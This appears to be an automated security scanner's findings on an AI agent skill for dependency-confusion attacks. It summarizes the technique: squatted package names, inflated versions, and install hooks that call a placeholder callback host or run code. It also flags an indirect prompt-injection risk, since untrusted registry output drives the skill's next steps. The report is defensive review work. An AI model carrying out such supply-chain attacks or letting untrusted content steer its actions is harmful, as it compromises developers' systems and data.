dependency-confusion

CRITICAL E005: Suspicious download URL detected in skill instructions.

• Suspicious download URL detected (high risk: 0.70). Mostly legitimate public resources (GitHub tools, Maven search) are listed, but the presence of attacker-controlled callback endpoints (YOUR_CALLBACK_HOST) and package-manager lifecycle PoC patterns indicates these links can be used to publish or trigger malicious packages—highly risky if used outside authorized testing.

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). The document is a high-risk, dual-use playbook that gives explicit, actionable instructions and code snippets to perform dependency-confusion supply-chain attacks (registering squatted package names, publishing higher semver, and using lifecycle hooks like preinstall/postinstall or custom install commands to trigger HTTP callbacks or arbitrary code execution), which enables remote code execution and potential data exfiltration and is readily weaponizable.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 1.00). The skill's Section 3 ("Check public squatting / claimability") explicitly instructs querying public registries (npm, PyPI, RubyGems, Maven Central via commands like npm view, pip install --dry-run, gem search, and curl to search.maven.org) and uses those external, untrusted results to drive the decision tree and follow-up PoC/exploitation steps in Section 4, so third‑party content can materially influence actions.